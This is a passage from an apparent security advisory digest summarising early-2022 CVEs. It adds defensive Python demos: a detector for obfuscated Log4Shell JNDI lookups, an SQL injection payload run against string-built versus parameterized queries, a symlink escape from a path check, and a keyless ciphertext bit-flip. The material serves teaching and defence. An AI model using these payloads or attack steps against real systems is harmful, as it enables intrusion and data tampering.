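            lambda m: m.group(1) if m.group(1) is not None else m.group(2), s
        )
    return s.lower()


def find_jndi_lookups(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize_lookups(line)
        if _JNDI.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, normalized in find_jndi_lookups(CONSTRUCTED_LOG_LINES):
        print(number, normalized)
```

The normalization step is what separates this from a plain `jndi` string match: line 4 never contains the letters "jndi" in sequence until its four default-value lookups are resolved. The regex only models the two obfuscation families shown; any lookup type a future payload uses has to be added to `_COLLAPSIBLE`, so treat this as a triage filter and keep the raw lines for review.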
NETGEAR has released security updates to address multiple vulnerabilities in wireless access
points. A remote attacker can exploit these vulnerabilities to take control of an affected
system.
The Android Security Bulletin contains details of security vulnerabilities affecting Android
devices. Security patch levels of 05 Jan 2022 or later address all of these issues.
Debian has released a security update for the Apache HTTP Server to resolve several
vulnerabilities. A malicious actor can take advantage of these vulnerabilities to cause
Denial of Service (DoS) or Server-Side Request Forgery (SSRF) attacks.
CVE ID: CVE-2021-44224 (High), CVE-2021-44790 (Critical)
Django has released security updates to resolve multiple vulnerabilities in Django. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-45452, CVE-2021-45116, CVE-2021-45115
An XSS vulnerability has been discovered in Latte, an open source template engine for PHP.
This vulnerability has been resolved in versions 2.8.8, 2.9.6 and 2.10.8.
CVE ID: CVE-2022-21648 (High)
A SQL injection vulnerability has been discovered in CodeIgniter. This vulnerability has
been resolved in version 4.1.6 and later.
CVE ID: CVE-2022-21647 (High)
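SQL injection appears several times in this section (the WordPress entry, the Cisco Prime Infrastructure / EPNM entry, and CodeIgniter here). The Python below is an added illustration written for this digest; it is not code from any of those projects and does not reproduce their specific bugs. It runs the same lookup against an in-memory SQLite table with string-built SQL and with a bound parameter, and adds the case parameters cannot cover, an attacker-chosen column name, which has to be allow-listed instead. The table and rows are constructed.

```python
import sqlite3

# Identifiers (column and table names) cannot be passed as bound parameters,
# so the only safe way to accept one from a caller is an allow-list.
ALLOWED_SORT_COLUMNS = {"id", "name", "role"}


def make_db():
    """In-memory table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, role TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO users (name, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user")],
    )
    return conn


def find_user_vulnerable(conn, name):
    """String-built query: the caller's quoting is the only defence, and a
    value containing a quote character rewrites the WHERE clause."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Bound parameter: the driver sends the value separately from the SQL
    text, so it can never become SQL syntax."""
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (name,)
    ).fetchall()


def list_users_safe(conn, sort_by="id"):
    """Identifier from the caller: validated against the allow-list, then
    quoted as an identifier so even a permitted name is never parsed as SQL."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    return conn.execute(f'SELECT name, role FROM users ORDER BY "{sort_by}"').fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", find_user_vulnerable(db, payload))
    print("safe:      ", find_user_safe(db, payload))
```

With the payload `' OR '1'='1` the string-built query becomes `... WHERE name = '' OR '1'='1'` and returns every row; the parameterized query looks for a user literally named `' OR '1'='1` and returns nothing.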
Multiple vulnerabilities have been discovered in Thunderbird, which can result in the
execution of arbitrary code, spoofing, information disclosure, downgrade attacks on SMTP
STARTTLS connections or misleading display of OpenPGP/MIME signatures. It is recommended to
upgrade thunderbird packages.
A heap-overflow vulnerability has been discovered in several VMware products. The affected
products are VMware ESXi, VMware Workstation, VMware Fusion and VMware Cloud Foundation.
CVE ID: CVE-2021-22045 (High)
Multiple vulnerabilities have been discovered in multiple IBM products. An attacker can
exploit some of these vulnerabilities to take control of an affected system.
A vulnerability has been discovered in linux kernel versions prior to 4.17 that affects
multiple NetApp Products. Successful exploitation of this vulnerability can lead to
disclosure of sensitive information, addition or modification of data, or Denial of Service
(DoS).
CVE ID: CVE-2018-25020 (High)
A vulnerability has been discovered in OpenSSL version 3.0.0 that affects multiple NetApp
Products. Successful exploitation of this vulnerability can lead to Denial of Service (DoS).
CVE ID: CVE-2021-4044 (Medium)
Microsoft has released an emergency out-of-band update for several Windows Server versions
to address an issue that might prevent users from using Remote Desktop to reach the server
and that also slows performance.
Debian has released a regression update for Salt that addresses multiple
vulnerabilities.
CVE ID: CVE-2020-16846 (Critical), CVE-2021-3197 (Critical), CVE-2020-28243 (High),
CVE-2021-25282 (Critical), CVE-2021-25284 (Medium)
An information exposure vulnerability has been discovered in Opmantek Open-AudIT 4.2.0 which
allows an authenticated attacker to read files outside of the restricted directory.
CVE ID: CVE-2021-44674
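Three entries in this section are variations on one mistake: a server decides whether a path is inside the directory it is allowed to serve, but decides on the path as written rather than on where it actually leads (the Samba symlink issue, the Sphinxsearch arbitrary file read, and the Open-AudIT read outside its restricted directory above). The Python below is an added illustration and is not code from any of those projects. It builds a constructed share directory containing a symlink that points outside it, then shows a lexical check accepting that path and a canonical-path check rejecting it. It does not reproduce the Samba race itself; see the caveat in the code.

```python
import os
import tempfile


def build_fixture():
    """Constructed layout: <tmp>/share is the exported root, <tmp>/private is
    not exported, and share/link is a symlink a malicious client planted."""
    base = tempfile.mkdtemp(prefix="share-demo-")
    share = os.path.join(base, "share")
    private = os.path.join(base, "private")
    os.mkdir(share)
    os.mkdir(private)
    with open(os.path.join(private, "secret.txt"), "w") as fh:
        fh.write("not exported\n")
    os.symlink(private, os.path.join(share, "link"))
    return share


def resolve_lexical(share_root, client_path):
    """Containment check that only normalises '..' components. It stops
    '../private/secret.txt', but symlinks are not followed, so a link inside
    the share that points outside it passes."""
    candidate = os.path.normpath(os.path.join(share_root, client_path))
    if candidate != share_root and not candidate.startswith(share_root + os.sep):
        raise PermissionError(f"{client_path!r} escapes the share")
    return candidate


def resolve_canonical(share_root, client_path):
    """Containment check on the fully resolved path: every symlink on the way
    is followed before the prefix comparison, so a link pointing outside the
    share is rejected.

    Caveat: there is still a window between this check and the later open in
    which the filesystem can change (the race the Samba advisory describes).
    Closing it needs per-component opens with O_NOFOLLOW / openat(2) rather
    than a check-then-open on a string."""
    root = os.path.realpath(share_root)
    candidate = os.path.realpath(os.path.join(root, client_path))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise PermissionError(f"{client_path!r} resolves outside the share")
    return candidate


if __name__ == "__main__":
    share = build_fixture()
    print("lexical  :", resolve_lexical(share, "link/secret.txt"))
    try:
        print("canonical:", resolve_canonical(share, "link/secret.txt"))
    except PermissionError as exc:
        print("canonical:", exc)
```

The realpath on `share_root` itself is not cosmetic: on systems where the temporary directory is itself a symlink (for example `/var` on macOS), comparing a resolved candidate against an unresolved root would reject every path.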
A Server-Side Request Forgery (SSRF) vulnerability has been discovered in Shockwall system
that results in arbitrary code execution for controlling the system or disrupting service.
CVE ID: CVE-2021-45917
It has been discovered that the ASUS RT-AX56U Wi-Fi router is vulnerable to a stack-based
buffer overflow due to improper validation of httpd parameter length. An authenticated
attacker on the local area network can execute arbitrary code to control the system or
disrupt service.
CVE ID: CVE-2021-44158
MediaTek has released security update to address multiple vulnerabilities affecting MediaTek
Smartphone, Tablet, AIoT, Smart display, Wi-Fi and TV chipsets.
It has been discovered that ENC DataVault 7.1.1W uses an inappropriate encryption algorithm,
such that an attacker who does not know the secret key can make modifications to the
ciphertext that are reflected in the decrypted plaintext.
CVE ID: CVE-2021-36751
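The DataVault entry above describes malleability: confidentiality without integrity. Any XOR-based stream construction (including AES-CTR) has this property, since flipping a ciphertext bit flips the same plaintext bit, and the attacker needs no key to do it. The Python below is an added illustration and is not DataVault's code or an account of its actual algorithm: it uses a toy HMAC-SHA256 keystream (an assumption made so the example runs on the standard library alone) to show the bit-flip, then wraps the same cipher in encrypt-then-MAC so the modification is detected instead of decrypted.

```python
import hashlib
import hmac

TAG_LEN = 32  # HMAC-SHA256 output


def _keystream(key, nonce, length):
    """Toy keystream: HMAC-SHA256(key, nonce || counter) blocks. Structurally
    like CTR mode, which is all that matters for the malleability shown here.
    Not a production cipher."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def stream_encrypt(key, nonce, data):
    """Unauthenticated stream encryption; decryption is the same operation."""
    return bytes(p ^ k for p, k in zip(data, _keystream(key, nonce, len(data))))


def flip_plaintext(ciphertext, offset, known, wanted):
    """Attacker step, no key involved: XOR the ciphertext with known ^ wanted
    so that the plaintext at `offset` changes from `known` to `wanted`."""
    ct = bytearray(ciphertext)
    for i, (a, b) in enumerate(zip(known, wanted)):
        ct[offset + i] ^= a ^ b
    return bytes(ct)


def _subkeys(key):
    """Derive independent encryption and MAC keys from one secret."""
    return (
        hmac.new(key, b"enc", hashlib.sha256).digest(),
        hmac.new(key, b"mac", hashlib.sha256).digest(),
    )


def aead_encrypt(key, nonce, plaintext):
    """Encrypt-then-MAC: the tag covers the nonce and the whole ciphertext."""
    enc_key, mac_key = _subkeys(key)
    ct = stream_encrypt(enc_key, nonce, plaintext)
    return ct + hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()


def aead_decrypt(key, nonce, blob):
    """Verify the tag in constant time before touching the ciphertext."""
    enc_key, mac_key = _subkeys(key)
    ct, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: ciphertext was modified")
    return stream_encrypt(enc_key, nonce, ct)


if __name__ == "__main__":
    key, nonce = b"k" * 32, b"n" * 16  # constructed, fixed for the demo
    message = b"transfer amount: 0100 to account 42"
    ct = stream_encrypt(key, nonce, message)
    forged = flip_plaintext(ct, message.index(b"0100"), b"0100", b"9900")
    print(stream_encrypt(key, nonce, forged))  # amount silently changed
    blob = aead_encrypt(key, nonce, message)
    try:
        aead_decrypt(key, nonce, flip_plaintext(blob, message.index(b"0100"), b"0100", b"9900"))
    except ValueError as exc:
        print(exc)
```

The attacker in `flip_plaintext` only needs to know (or guess) what plaintext sits at a given offset, which for structured files and messages is usually easy. In practice use an AEAD mode such as AES-GCM or ChaCha20-Poly1305 rather than assembling encrypt-then-MAC by hand; the example builds it up only to make the reason for the tag visible.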
It has been discovered that Expat versions before 2.4.3, a stream-oriented XML 1.0 parser
library, contain a realloc misbehavior vulnerability.
CVE ID: CVE-2021-45960
It has been discovered that Microsoft Exchange Server 2016 and Exchange Server 2019 have a
problem related to a date check failure with the change to the new year 2022, which causes
the malware scanning engine to crash, resulting in messages being stuck in transport queues.